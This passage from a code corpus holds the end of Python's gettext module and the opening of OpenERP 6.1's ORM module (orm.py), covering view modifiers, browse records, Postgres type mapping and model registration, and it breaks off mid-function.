ldgettext(_current_domain, message) def ngettext(msgid1, msgid2, n): return dngettext(_current_domain, msgid1, msgid2, n) def lngettext(msgid1, msgid2, n): return ldngettext(_current_domain, msgid1, msgid2, n) # dcgettext() has been deemed unnecessary and is not implemented. # James Henstridge's Catalog constructor from GNOME gettext. Documented usage # was: # # import gettext # cat = gettext.Catalog(PACKAGE, localedir=LOCALEDIR) # _ = cat.gettext # print _('Hello World') # The resulting catalog object currently don't support access through a # dictionary API, which was supported (but apparently unused) in GNOME # gettext. Catalog = translation
apache-2.0
factorlibre/openerp-server-6.1
openerp/osv/orm.py
3
245253
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## #.apidoc title: Object Relational Mapping #.apidoc module-mods: member-order: bysource """ Object relational mapping to database (postgresql) module * Hierarchical structure * Constraints consistency, validations * Object meta Data depends on its status * Optimised processing by complex query (multiple actions at once) * Default fields value * Permissions optimisation * Persistant object: DB postgresql * Datas conversions * Multi-level caching system * 2 different inheritancies * Fields: - classicals (varchar, integer, boolean, ...) - relations (one2many, many2one, many2many) - functions """ import calendar import copy import datetime import itertools import logging import operator import pickle import re import simplejson import time import types from lxml import etree import fields import openerp import openerp.netsvc as netsvc import openerp.tools as tools from openerp.tools.config import config from openerp.tools.safe_eval import safe_eval as eval from openerp.tools.translate import _ from openerp import SUPERUSER_ID from query import Query _logger = logging.getLogger(__name__) _schema = logging.getLogger(__name__ + '.schema') # List of etree._Element subclasses that we choose to ignore when parsing XML. from openerp.tools import SKIPPED_ELEMENT_TYPES regex_order = re.compile('^(([a-z0-9_]+|"[a-z0-9_]+")( *desc| *asc)?( *, *|))+$', re.I) regex_object_name = re.compile(r'^[a-z0-9_.]+$') def transfer_field_to_modifiers(field, modifiers): default_values = {} state_exceptions = {} for attr in ('invisible', 'readonly', 'required'): state_exceptions[attr] = [] default_values[attr] = bool(field.get(attr)) for state, modifs in (field.get("states",{})).items(): for modif in modifs: if default_values[modif[0]] != modif[1]: state_exceptions[modif[0]].append(state) for attr, default_value in default_values.items(): if state_exceptions[attr]: modifiers[attr] = [("state", "not in" if default_value else "in", state_exceptions[attr])] else: modifiers[attr] = default_value # Don't deal with groups, it is done by check_group(). # Need the context to evaluate the invisible attribute on tree views. # For non-tree views, the context shouldn't be given. def transfer_node_to_modifiers(node, modifiers, context=None, in_tree_view=False): if node.get('attrs'): modifiers.update(eval(node.get('attrs'))) if node.get('states'): if 'invisible' in modifiers and isinstance(modifiers['invisible'], list): # TODO combine with AND or OR, use implicit AND for now. modifiers['invisible'].append(('state', 'not in', node.get('states').split(','))) else: modifiers['invisible'] = [('state', 'not in', node.get('states').split(','))] for a in ('invisible', 'readonly', 'required'): if node.get(a): v = bool(eval(node.get(a), {'context': context or {}})) if in_tree_view and a == 'invisible': # Invisible in a tree view has a specific meaning, make it a # new key in the modifiers attribute. modifiers['tree_invisible'] = v elif v or (a not in modifiers or not isinstance(modifiers[a], list)): # Don't set the attribute to False if a dynamic value was # provided (i.e. a domain from attrs or states). modifiers[a] = v def simplify_modifiers(modifiers): for a in ('invisible', 'readonly', 'required'): if a in modifiers and not modifiers[a]: del modifiers[a] def transfer_modifiers_to_node(modifiers, node): if modifiers: simplify_modifiers(modifiers) node.set('modifiers', simplejson.dumps(modifiers)) def setup_modifiers(node, field=None, context=None, in_tree_view=False): """ Processes node attributes and field descriptors to generate the ``modifiers`` node attribute and set it on the provided node. Alters its first argument in-place. :param node: ``field`` node from an OpenERP view :type node: lxml.etree._Element :param dict field: field descriptor corresponding to the provided node :param dict context: execution context used to evaluate node attributes :param bool in_tree_view: triggers the ``tree_invisible`` code path (separate from ``invisible``): in tree view there are two levels of invisibility, cell content (a column is present but the cell itself is not displayed) with ``invisible`` and column invisibility (the whole column is hidden) with ``tree_invisible``. :returns: nothing """ modifiers = {} if field is not None: transfer_field_to_modifiers(field, modifiers) transfer_node_to_modifiers( node, modifiers, context=context, in_tree_view=in_tree_view) transfer_modifiers_to_node(modifiers, node) def test_modifiers(what, expected): modifiers = {} if isinstance(what, basestring): node = etree.fromstring(what) transfer_node_to_modifiers(node, modifiers) simplify_modifiers(modifiers) json = simplejson.dumps(modifiers) assert json == expected, "%s != %s" % (json, expected) elif isinstance(what, dict): transfer_field_to_modifiers(what, modifiers) simplify_modifiers(modifiers) json = simplejson.dumps(modifiers) assert json == expected, "%s != %s" % (json, expected) # To use this test: # import openerp # openerp.osv.orm.modifiers_tests() def modifiers_tests(): test_modifiers('<field name="a"/>', '{}') test_modifiers('<field name="a" invisible="1"/>', '{"invisible": true}') test_modifiers('<field name="a" readonly="1"/>', '{"readonly": true}') test_modifiers('<field name="a" required="1"/>', '{"required": true}') test_modifiers('<field name="a" invisible="0"/>', '{}') test_modifiers('<field name="a" readonly="0"/>', '{}') test_modifiers('<field name="a" required="0"/>', '{}') test_modifiers('<field name="a" invisible="1" required="1"/>', '{"invisible": true, "required": true}') # TODO order is not guaranteed test_modifiers('<field name="a" invisible="1" required="0"/>', '{"invisible": true}') test_modifiers('<field name="a" invisible="0" required="1"/>', '{"required": true}') test_modifiers("""<field name="a" attrs="{'invisible': [('b', '=', 'c')]}"/>""", '{"invisible": [["b", "=", "c"]]}') # The dictionary is supposed to be the result of fields_get(). test_modifiers({}, '{}') test_modifiers({"invisible": True}, '{"invisible": true}') test_modifiers({"invisible": False}, '{}') def check_object_name(name): """ Check if the given name is a valid openerp object name. The _name attribute in osv and osv_memory object is subject to some restrictions. This function returns True or False whether the given name is allowed or not. TODO: this is an approximation. The goal in this approximation is to disallow uppercase characters (in some places, we quote table/column names and in other not, which leads to this kind of errors: psycopg2.ProgrammingError: relation "xxx" does not exist). The same restriction should apply to both osv and osv_memory objects for consistency. """ if regex_object_name.match(name) is None: return False return True def raise_on_invalid_object_name(name): if not check_object_name(name): msg = "The _name attribute %s is not valid." % name _logger.error(msg) raise except_orm('ValueError', msg) POSTGRES_CONFDELTYPES = { 'RESTRICT': 'r', 'NO ACTION': 'a', 'CASCADE': 'c', 'SET NULL': 'n', 'SET DEFAULT': 'd', } def intersect(la, lb): return filter(lambda x: x in lb, la) def fix_import_export_id_paths(fieldname): """ Fixes the id fields in import and exports, and splits field paths on '/'. :param str fieldname: name of the field to import/export :return: split field name :rtype: list of str """ fixed_db_id = re.sub(r'([^/])\.id', r'\1/.id', fieldname) fixed_external_id = re.sub(r'([^/]):id', r'\1/id', fixed_db_id) return fixed_external_id.split('/') class except_orm(Exception): def __init__(self, name, value): self.name = name self.value = value self.args = (name, value) class BrowseRecordError(Exception): pass class browse_null(object): """ Readonly python database object browser """ def __init__(self): self.id = False def __getitem__(self, name): return None def __getattr__(self, name): return None # XXX: return self ? def __int__(self): return False def __str__(self): return '' def __nonzero__(self): return False def __unicode__(self): return u'' # # TODO: execute an object method on browse_record_list # class browse_record_list(list): """ Collection of browse objects Such an instance will be returned when doing a ``browse([ids..])`` and will be iterable, yielding browse() objects """ def __init__(self, lst, context=None): if not context: context = {} super(browse_record_list, self).__init__(lst) self.context = context class browse_record(object): """ An object that behaves like a row of an object's table. It has attributes after the columns of the corresponding object. Examples:: uobj = pool.get('res.users') user_rec = uobj.browse(cr, uid, 104) name = user_rec.name """ def __init__(self, cr, uid, id, table, cache, context=None, list_class=browse_record_list, fields_process=None): """ :param table: the browsed object (inherited from orm) :param dict cache: a dictionary of model->field->data to be shared across browse objects, thus reducing the SQL read()s. It can speed up things a lot, but also be disastrous if not discarded after write()/unlink() operations :param dict context: dictionary with an optional context """ if fields_process is None: fields_process = {} if context is None: context = {} self._list_class = list_class self._cr = cr self._uid = uid self._id = id self._table = table # deprecated, use _model! self._model = table self._table_name = self._table._name self.__logger = logging.getLogger('openerp.osv.orm.browse_record.' + self._table_name) self._context = context self._fields_process = fields_process cache.setdefault(table._name, {}) self._data = cache[table._name] # if not (id and isinstance(id, (int, long,))): # raise BrowseRecordError(_('Wrong ID for the browse record, got %r, expected an integer.') % (id,)) # if not table.exists(cr, uid, id, context): # raise BrowseRecordError(_('Object %s does not exists') % (self,)) if id not in self._data: self._data[id] = {'id': id} self._cache = cache def __getitem__(self, name): if name == 'id': return self._id if name not in self._data[self._id]: # build the list of fields we will fetch # fetch the definition of the field which was asked for if name in self._table._columns: col = self._table._columns[name] elif name in self._table._inherit_fields: col = self._table._inherit_fields[name][2] elif hasattr(self._table, str(name)): attr = getattr(self._table, name) if isinstance(attr, (types.MethodType, types.LambdaType, types.FunctionType)): def function_proxy(*args, **kwargs): if 'context' not in kwargs and self._context: kwargs.update(context=self._context) return attr(self._cr, self._uid, [self._id], *args, **kwargs) return function_proxy else: return attr else: error_msg = "Field '%s' does not exist in object '%s'" % (name, self) self.__logger.warning(error_msg) raise KeyError(error_msg) # if the field is a classic one or a many2one, we'll fetch all classic and many2one fields if col._prefetch: # gen the list of "local" (ie not inherited) fields which are classic or many2one fields_to_fetch = filter(lambda x: x[1]._classic_write, self._table._columns.items()) # gen the list of inherited fields inherits = map(lambda x: (x[0], x[1][2]), self._table._inherit_fields.items()) # complete the field list with the inherited fields which are classic or many2one fields_to_fetch += filter(lambda x: x[1]._classic_write, inherits) # otherwise we fetch only that field else: fields_to_fetch = [(name, col)] ids = filter(lambda id: name not in self._data[id], self._data.keys()) # read the results field_names = map(lambda x: x[0], fields_to_fetch) field_values = self._table.read(self._cr, self._uid, ids, field_names, context=self._context, load="_classic_write") # TODO: improve this, very slow for reports if self._fields_process: lang = self._context.get('lang', 'en_US') or 'en_US' lang_obj_ids = self.pool.get('res.lang').search(self._cr, self._uid, [('code', '=', lang)]) if not lang_obj_ids: raise Exception(_('Language with code "%s" is not defined in your system !\nDefine it through the Administration menu.') % (lang,)) lang_obj = self.pool.get('res.lang').browse(self._cr, self._uid, lang_obj_ids[0]) for field_name, field_column in fields_to_fetch: if field_column._type in self._fields_process: for result_line in field_values: result_line[field_name] = self._fields_process[field_column._type](result_line[field_name]) if result_line[field_name]: result_line[field_name].set_value(self._cr, self._uid, result_line[field_name], self, field_column, lang_obj) if not field_values: # Where did those ids come from? Perhaps old entries in ir_model_dat? _logger.warning("No field_values found for ids %s in %s", ids, self) raise KeyError('Field %s not found in %s'%(name, self)) # create browse records for 'remote' objects for result_line in field_values: new_data = {} for field_name, field_column in fields_to_fetch: if field_column._type in ('many2one', 'one2one'): if result_line[field_name]: obj = self._table.pool.get(field_column._obj) if isinstance(result_line[field_name], (list, tuple)): value = result_line[field_name][0] else: value = result_line[field_name] if value: # FIXME: this happen when a _inherits object # overwrite a field of it parent. Need # testing to be sure we got the right # object and not the parent one. if not isinstance(value, browse_record): if obj is None: # In some cases the target model is not available yet, so we must ignore it, # which is safe in most cases, this value will just be loaded later when needed. # This situation can be caused by custom fields that connect objects with m2o without # respecting module dependencies, causing relationships to be connected to soon when # the target is not loaded yet. continue new_data[field_name] = browse_record(self._cr, self._uid, value, obj, self._cache, context=self._context, list_class=self._list_class, fields_process=self._fields_process) else: new_data[field_name] = value else: new_data[field_name] = browse_null() else: new_data[field_name] = browse_null() elif field_column._type in ('one2many', 'many2many') and len(result_line[field_name]): new_data[field_name] = self._list_class([browse_record(self._cr, self._uid, id, self._table.pool.get(field_column._obj), self._cache, context=self._context, list_class=self._list_class, fields_process=self._fields_process) for id in result_line[field_name]], self._context) elif field_column._type in ('reference'): if result_line[field_name]: if isinstance(result_line[field_name], browse_record): new_data[field_name] = result_line[field_name] else: ref_obj, ref_id = result_line[field_name].split(',') ref_id = long(ref_id) if ref_id: obj = self._table.pool.get(ref_obj) new_data[field_name] = browse_record(self._cr, self._uid, ref_id, obj, self._cache, context=self._context, list_class=self._list_class, fields_process=self._fields_process) else: new_data[field_name] = browse_null() else: new_data[field_name] = browse_null() else: new_data[field_name] = result_line[field_name] self._data[result_line['id']].update(new_data) if not name in self._data[self._id]: # How did this happen? Could be a missing model due to custom fields used too soon, see above. self.__logger.error("Fields to fetch: %s, Field values: %s", field_names, field_values) self.__logger.error("Cached: %s, Table: %s", self._data[self._id], self._table) raise KeyError(_('Unknown attribute %s in %s ') % (name, self)) return self._data[self._id][name] def __getattr__(self, name): try: return self[name] except KeyError, e: raise AttributeError(e) def __contains__(self, name): return (name in self._table._columns) or (name in self._table._inherit_fields) or hasattr(self._table, name) def __iter__(self): raise NotImplementedError("Iteration is not allowed on %s" % self) def __hasattr__(self, name): return name in self def __int__(self): return self._id def __str__(self): return "browse_record(%s, %d)" % (self._table_name, self._id) def __eq__(self, other): if not isinstance(other, browse_record): return False return (self._table_name, self._id) == (other._table_name, other._id) def __ne__(self, other): if not isinstance(other, browse_record): return True return (self._table_name, self._id) != (other._table_name, other._id) # we need to define __unicode__ even though we've already defined __str__ # because we have overridden __getattr__ def __unicode__(self): return unicode(str(self)) def __hash__(self): return hash((self._table_name, self._id)) __repr__ = __str__ def refresh(self): """Force refreshing this browse_record's data and all the data of the records that belong to the same cache, by emptying the cache completely, preserving only the record identifiers (for prefetching optimizations). """ for model, model_cache in self._cache.iteritems(): # only preserve the ids of the records that were in the cache cached_ids = dict([(i, {'id': i}) for i in model_cache.keys()]) self._cache[model].clear() self._cache[model].update(cached_ids) def pg_varchar(size=0): """ Returns the VARCHAR declaration for the provided size: * If no size (or an empty or negative size is provided) return an 'infinite' VARCHAR * Otherwise return a VARCHAR(n) :type int size: varchar size, optional :rtype: str """ if size: if not isinstance(size, int): raise TypeError("VARCHAR parameter should be an int, got %s" % type(size)) if size > 0: return 'VARCHAR(%d)' % size return 'VARCHAR' FIELDS_TO_PGTYPES = { fields.boolean: 'bool', fields.integer: 'int4', fields.integer_big: 'int8', fields.text: 'text', fields.date: 'date', fields.time: 'time', fields.datetime: 'timestamp', fields.binary: 'bytea', fields.many2one: 'int4', fields.serialized: 'text', } def get_pg_type(f, type_override=None): """ :param fields._column f: field to get a Postgres type for :param type type_override: use the provided type for dispatching instead of the field's own type :returns: (postgres_identification_type, postgres_type_specification) :rtype: (str, str) """ field_type = type_override or type(f) if field_type in FIELDS_TO_PGTYPES: pg_type = (FIELDS_TO_PGTYPES[field_type], FIELDS_TO_PGTYPES[field_type]) elif issubclass(field_type, fields.float): if f.digits: pg_type = ('numeric', 'NUMERIC') else: pg_type = ('float8', 'DOUBLE PRECISION') elif issubclass(field_type, (fields.char, fields.reference)): pg_type = ('varchar', pg_varchar(f.size)) elif issubclass(field_type, fields.selection): if (isinstance(f.selection, list) and isinstance(f.selection[0][0], int))\ or getattr(f, 'size', None) == -1: pg_type = ('int4', 'INTEGER') else: pg_type = ('varchar', pg_varchar(getattr(f, 'size', None))) elif issubclass(field_type, fields.function): if f._type == 'selection': pg_type = ('varchar', pg_varchar()) else: pg_type = get_pg_type(f, getattr(fields, f._type)) else: _logger.warning('%s type not supported!', field_type) pg_type = None return pg_type class MetaModel(type): """ Metaclass for the Model. This class is used as the metaclass for the Model class to discover the models defined in a module (i.e. without instanciating them). If the automatic discovery is not needed, it is possible to set the model's _register attribute to False. """ module_to_models = {} def __init__(self, name, bases, attrs): if not self._register: self._register = True super(MetaModel, self).__init__(name, bases, attrs) return # The (OpenERP) module name can be in the `openerp.addons` namespace # or not. For instance module `sale` can be imported as # `openerp.addons.sale` (the good way) or `sale` (for backward # compatibility). module_parts = self.__module__.split('.') if len(module_parts) > 2 and module_parts[0] == 'openerp' and \ module_parts[1] == 'addons': module_name = self.__module__.split('.')[2] else: module_name = self.__module__.split('.')[0] if not hasattr(self, '_module'): self._module = module_name # Remember which models to instanciate for this module. self.module_to_models.setdefault(self._module, []).append(self) # Definition of log access columns, automatically added to models if # self._log_access is True LOG_ACCESS_COLUMNS = { 'create_uid': 'INTEGER REFERENCES res_users ON DELETE SET NULL', 'create_date': 'TIMESTAMP', 'write_uid': 'INTEGER REFERENCES res_users ON DELETE SET NULL', 'write_date': 'TIMESTAMP' } # special columns automatically created by the ORM MAGIC_COLUMNS = ['id'] + LOG_ACCESS_COLUMNS.keys() class BaseModel(object): """ Base class for OpenERP models. OpenERP models are created by inheriting from this class' subclasses: * Model: for regular database-persisted models * TransientModel: for temporary data, stored in the database but automatically vaccuumed every so often * AbstractModel: for abstract super classes meant to be shared by multiple _inheriting classes (usually Models or TransientModels) The system will later instantiate the class once per database (on which the class' module is installed). To create a class that should not be instantiated, the _register class attribute may be set to False. """ __metaclass__ = MetaModel _register = False # Set to false if the model shouldn't be automatically discovered. _name = None _columns = {} _constraints = [] _defaults = {} _rec_name = 'name' _parent_name = 'parent_id' _parent_store = False _parent_order = False _date_name = 'date' _order = 'id' _sequence = None _description = None # dict of {field:method}, with method returning the name_get of records # to include in the _read_group, if grouped on this field _group_by_full = {} # Transience _transient = False # True in a TransientModel _transient_max_count = None _transient_max_hours = None _transient_check_time = 20 # structure: # { 'parent_model': 'm2o_field', ... } _inherits = {} # Mapping from inherits'd field name to triple (m, r, f, n) where m is the # model from which it is inherits'd, r is the (local) field towards m, f # is the _column object itself, and n is the original (i.e. top-most) # parent model. # Example: # { 'field_name': ('parent_model', 'm2o_field_to_reach_parent', # field_column_obj, origina_parent_model), ... } _inherit_fields = {} # Mapping field name/column_info object # This is similar to _inherit_fields but: # 1. includes self fields, # 2. uses column_info instead of a triple. _all_columns = {} _table = None _invalids = set() _log_create = False _sql_constraints = [] _protected = ['read', 'write', 'create', 'default_get', 'perm_read', 'unlink', 'fields_get', 'fields_view_get', 'search', 'name_get', 'distinct_field_get', 'name_search', 'copy', 'import_data', 'search_count', 'exists'] CONCURRENCY_CHECK_FIELD = '__last_update' def log(self, cr, uid, id, message, secondary=False, context=None): if context and context.get('disable_log'): return True return self.pool.get('res.log').create(cr, uid, { 'name': message, 'res_model': self._name, 'secondary': secondary, 'res_id': id, }, context=context ) def view_init(self, cr, uid, fields_list, context=None): """Override this method to do specific things when a view on the object is opened.""" pass def _field_create(self, cr, context=None): """ Create entries in ir_model_fields for all the model's fields. If necessary, also create an entry in ir_model, and if called from the modules loading scheme (by receiving 'module' in the context), also create entries in ir_model_data (for the model and the fields). - create an entry in ir_model (if there is not already one), - create an entry in ir_model_data (if there is not already one, and if 'module' is in the context), - update ir_model_fields with the fields found in _columns (TODO there is some redundancy as _columns is updated from ir_model_fields in __init__). """ if context is None: context = {} cr.execute("SELECT id FROM ir_model WHERE model=%s", (self._name,)) if not cr.rowcount: cr.execute('SELECT nextval(%s)', ('ir_model_id_seq',)) model_id = cr.fetchone()[0] cr.execute("INSERT INTO ir_model (id,model, name, info,state) VALUES (%s, %s, %s, %s, %s)", (model_id, self._name, self._description, self.__doc__, 'base')) else: model_id = cr.fetchone()[0] if 'module' in context: name_id = 'model_'+self._name.replace('.', '_') cr.execute('select * from ir_model_data where name=%s and module=%s', (name_id, context['module'])) if not cr.rowcount: cr.execute("INSERT INTO ir_model_data (name,date_init,date_update,module,model,res_id) VALUES (%s, (now() at time zone 'UTC'), (now() at time zone 'UTC'), %s, %s, %s)", \ (name_id, context['module'], 'ir.model', model_id) ) cr.commit() cr.execute("SELECT * FROM ir_model_fields WHERE model=%s", (self._name,)) cols = {} for rec in cr.dictfetchall(): cols[rec['name']] = rec ir_model_fields_obj = self.pool.get('ir.model.fields') # sparse field should be created at the end, as it depends on its serialized field already existing model_fields = sorted(self._columns.items(), key=lambda x: 1 if x[1]._type == 'sparse' else 0) for (k, f) in model_fields: vals = { 'model_id': model_id, 'model': self._name, 'name': k, 'field_description': f.string.replace("'", " "), 'ttype': f._type, 'relation': f._obj or '', 'view_load': (f.view_load and 1) or 0, 'select_level': tools.ustr(f.select or 0), 'readonly': (f.readonly and 1) or 0, 'required': (f.required and 1) or 0, 'selectable': (f.selectable and 1) or 0, 'translate': (f.translate and 1) or 0, 'relation_field': (f._type=='one2many' and isinstance(f, fields.one2many)) and f._fields_id or '', 'serialization_field_id': None, } if getattr(f, 'serialization_field', None): # resolve link to serialization_field if specified by name serialization_field_id = ir_model_fields_obj.search(cr, 1, [('model','=',vals['model']), ('name', '=', f.serialization_field)]) if not serialization_field_id: raise except_orm(_('Error'), _("Serialization field `%s` not found for sparse field `%s`!") % (f.serialization_field, k)) vals['serialization_field_id'] = serialization_field_id[0] # When its a custom field,it does not contain f.select if context.get('field_state', 'base') == 'manual': if context.get('field_name', '') == k: vals['select_level'] = context.get('select', '0') #setting value to let the problem NOT occur next time elif k in cols: vals['select_level'] = cols[k]['select_level'] if k not in cols: cr.execute('select nextval(%s)', ('ir_model_fields_id_seq',)) id = cr.fetchone()[0] vals['id'] = id cr.execute("""INSERT INTO ir_model_fields ( id, model_id, model, name, field_description, ttype, relation,view_load,state,select_level,relation_field, translate, serialization_field_id ) VALUES ( %s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s )""", ( id, vals['model_id'], vals['model'], vals['name'], vals['field_description'], vals['ttype'], vals['relation'], bool(vals['view_load']), 'base', vals['select_level'], vals['relation_field'], bool(vals['translate']), vals['serialization_field_id'] )) if 'module' in context: name1 = 'field_' + self._table + '_' + k cr.execute("select name from ir_model_data where name=%s", (name1,)) if cr.fetchone(): name1 = name1 + "_" + str(id) cr.execute("INSERT INTO ir_model_data (name,date_init,date_update,module,model,res_id) VALUES (%s, (now() at time zone 'UTC'), (now() at time zone 'UTC'), %s, %s, %s)", \ (name1, context['module'], 'ir.model.fields', id) ) else: for key, val in vals.items(): if cols[k][key] != vals[key]: cr.execute('update ir_model_fields set field_description=%s where model=%s and name=%s', (vals['field_description'], vals['model'], vals['name'])) cr.commit() cr.execute("""UPDATE ir_model_fields SET model_id=%s, field_description=%s, ttype=%s, relation=%s, view_load=%s, select_level=%s, readonly=%s ,required=%s, selectable=%s, relation_field=%s, translate=%s, serialization_field_id=%s WHERE model=%s AND name=%s""", ( vals['model_id'], vals['field_description'], vals['ttype'], vals['relation'], bool(vals['view_load']), vals['select_level'], bool(vals['readonly']), bool(vals['required']), bool(vals['selectable']), vals['relation_field'], bool(vals['translate']), vals['serialization_field_id'], vals['model'], vals['name'] )) break cr.commit() # # Goal: try to apply inheritance at the instanciation level and # put objects in the pool var # @classmethod def create_instance(cls, pool, cr): """ Instanciate a given model. This class method instanciates the class of some model (i.e. a class deriving from osv or osv_memory). The class might be the class passed in argument or, if it inherits from another class, a class constructed by combining the two classes. The ``attributes`` argument specifies which parent class attributes have to be combined. TODO: the creation of the combined class is repeated at each call of this method. This is probably unnecessary. """ attributes = ['_columns', '_defaults', '_inherits', '_constraints', '_sql_constraints'] parent_names = getattr(cls, '_inherit', None) if parent_names: if isinstance(parent_names, (str, unicode)): name = cls._name or parent_names parent_names = [parent_names] else: name = cls._name if not name: raise TypeError('_name is mandatory in case of multiple inheritance') for parent_name in ((type(parent_names)==list) and parent_names or [parent_names]): parent_model = pool.get(parent_name) if not parent_model: raise TypeError('The model "%s" specifies an unexisting parent class "%s"\n' 'You may need to add a dependency on the parent class\' module.' % (name, parent_name)) if not getattr(cls, '_original_module', None) and name == parent_model._name: cls._original_module = parent_model._original_module parent_class = parent_model.__class__ nattr = {} for s in attributes: new = copy.copy(getattr(parent_model, s, {})) if s == '_columns': # Don't _inherit custom fields. for c in new.keys(): if new[c].manual: del new[c] # Duplicate float fields because they have a .digits # cache (which must be per-registry, not server-wide). for c in new.keys(): if new[c]._type == 'float': new[c] = copy.copy(new[c]) if hasattr(new, 'update'): new.update(cls.__dict__.get(s, {})) elif s=='_constraints': for c in cls.__dict__.get(s, []): exist = False for c2 in range(len(new)): #For _constraints, we should check field and methods as well if new[c2][2]==c[2] and (new[c2][0] == c[0] \ or getattr(new[c2][0],'__name__', True) == \ getattr(c[0],'__name__', False)): # If new class defines a constraint with # same function name, we let it override # the old one. new[c2] = c exist = True break if not exist: new.append(c) else: new.extend(cls.__dict__.get(s, [])) nattr[s] = new cls = type(name, (cls, parent_class), dict(nattr, _register=False)) if not getattr(cls, '_original_module', None): cls._original_module = cls._module obj = object.__new__(cls) obj.__init__(pool, cr) return obj def __new__(cls): """Register this model. This doesn't create an instance but simply register the model as being part of the module where it is defined. """ # Set the module name (e.g. base, sale, accounting, ...) on the class. module = cls.__module__.split('.')[0] if not hasattr(cls, '_module'): cls._module = module # Record this class in the list of models to instantiate for this module, # managed by the metaclass. module_model_list = MetaModel.module_to_models.setdefault(cls._module, []) if cls not in module_model_list: module_model_list.append(cls) # Since we don't return an instance here, the __init__ # method won't be called. return None def __init__(self, pool, cr): """ Initialize a model and make it part of the given registry. - copy the stored fields' functions in the osv_pool, - update the _columns with the fields found in ir_model_fields, - ensure there is a many2one for each _inherits'd parent, - update the children's _columns, - give a chance to each field to initialize itself. """ pool.add(self._name, self) self.pool = pool if not self._name and not hasattr(self, '_inherit'): name = type(self).__name__.split('.')[0] msg = "The class %s has to have a _name attribute" % name _logger.error(msg) raise except_orm('ValueError', msg) if not self._description: self._description = self._name if not self._table: self._table = self._name.replace('.', '_') if not hasattr(self, '_log_access'): # If _log_access is not specified, it is the same value as _auto. self._log_access = getattr(self, "_auto", True) self._columns = self._columns.copy() for store_field in self._columns: f = self._columns[store_field] if hasattr(f, 'digits_change'): f.digits_change(cr) def not_this_field(stored_func): x, y, z, e, f, l = stored_func return x != self._name or y != store_field self.pool._store_function[self._name] = filter(not_this_field, self.pool._store_function.get(self._name, [])) if not isinstance(f, fields.function): continue if not f.store: continue sm = f.store if sm is True: sm = {self._name: (lambda self, cr, uid, ids, c={}: ids, None, 10, None)} for object, aa in sm.items(): if len(aa) == 4: (fnct, fields2, order, length) = aa elif len(aa) == 3: (fnct, fields2, order) = aa length = None else: raise except_orm('Error', ('Invalid function definition %s in object %s !\nYou must use the definition: store={object:(fnct, fields, priority, time length)}.' % (store_field, self._name))) self.pool._store_function.setdefault(object, []) self.pool._store_function[object].append((self._name, store_field, fnct, tuple(fields2) if fields2 else None, order, length)) self.pool._store_function[object].sort(lambda x, y: cmp(x[4], y[4])) for (key, _, msg) in self._sql_constraints: self.pool._sql_error[self._table+'_'+key] = msg # Load manual fields cr.execute("SELECT id FROM ir_model_fields WHERE name=%s AND model=%s", ('state', 'ir.model.fields')) if cr.fetchone(): cr.execute('SELECT * FROM ir_model_fields WHERE model=%s AND state=%s', (self._name, 'manual')) for field in cr.dictfetchall(): if field['name'] in self._columns: continue attrs = { 'string': field['field_description'], 'required': bool(field['required']), 'readonly': bool(field['readonly']), 'domain': eval(field['domain']) if field['domain'] else None, 'size': field['size'], 'ondelete': field['on_delete'], 'translate': (field['translate']), 'manual': True, #'select': int(field['select_level']) } if field['serialization_field_id']: cr.execute('SELECT name FROM ir_model_fields WHERE id=%s', (field['serialization_field_id'],)) attrs.update({'serialization_field': cr.fetchone()[0], 'type': field['ttype']}) if field['ttype'] in ['many2one', 'one2many', 'many2many']: attrs.update({'relation': field['relation']}) self._columns[field['name']] = fields.sparse(**attrs) elif field['ttype'] == 'selection': self._columns[field['name']] = fields.selection(eval(field['selection']), **attrs) elif field['ttype'] == 'reference': self._columns[field['name']] = fields.reference(selection=eval(field['selection']), **attrs) elif field['ttype'] == 'many2one': self._columns[field['name']] = fields.many2one(field['relation'], **attrs) elif field['ttype'] == 'one2many': self._columns[field['name']] = fields.one2many(field['relation'], field['relation_field'], **attrs) elif field['ttype'] == 'many2many': _rel1 = field['relation'].replace('.', '_') _rel2 = field['model'].replace('.', '_') _rel_name = 'x_%s_%s_%s_rel' % (_rel1, _rel2, field['name']) self._columns[field['name']] = fields.many2many(field['relation'], _rel_name, 'id1', 'id2', **attrs) else: self._columns[field['name']] = getattr(fields, field['ttype'])(**attrs) self._inherits_check() self._inherits_reload() if not self._sequence: self._sequence = self._table + '_id_seq' for k in self._defaults: assert (k in self._columns) or (k in self._inherit_fields), 'Default function defined in %s but field %s does not exist !' % (self._name, k,) for f in self._columns: self._columns[f].restart() # Transience if self.is_transient(): self._transient_check_count = 0 self._transient_max_count = config.get('osv_memory_count_limit') self._transient_max_hours = config.get('osv_memory_age_limit') assert self._log_access, "TransientModels must have log_access turned on, "\ "in order to implement their access rights policy" def __export_row(self, cr, uid, row, fields, context=None): if context is None: context = {} def check_type(field_type): if field_type == 'float': return 0.0 elif field_type == 'integer': return 0 elif field_type == 'boolean': return 'False' return '' def selection_field(in_field): col_obj = self.pool.get(in_field.keys()[0]) if f[i] in col_obj._columns.keys(): return col_obj._columns[f[i]] elif f[i] in col_obj._inherits.keys(): selection_field(col_obj._inherits) else: return False def _get_xml_id(self, cr, uid, r): model_data = self.pool.get('ir.model.data') data_ids = model_data.search(cr, uid, [('model', '=', r._table_name), ('res_id', '=', r['id'])]) if len(data_ids): d = model_data.read(cr, uid, data_ids, ['name', 'module'])[0] if d['module']: r = '%s.%s' % (d['module'], d['name']) else: r = d['name'] else: postfix = 0 while True: n = self._table+'_'+str(r['id']) + (postfix and ('_'+str(postfix)) or '' ) if not model_data.search(cr, uid, [('name', '=', n)]): break postfix += 1 model_data.create(cr, SUPERUSER_ID, { 'name': n, 'model': self._name, 'res_id': r['id'], 'module': '__export__', }) r = '__export__.'+n return r lines = [] data = map(lambda x: '', range(len(fields))) done = [] for fpos in range(len(fields)): f = fields[fpos] if f: r = row i = 0 while i < len(f): cols = False if f[i] == '.id': r = r['id'] elif f[i] == 'id': r = _get_xml_id(self, cr, uid, r) else: r = r[f[i]] # To display external name of selection field when its exported if f[i] in self._columns.keys(): cols = 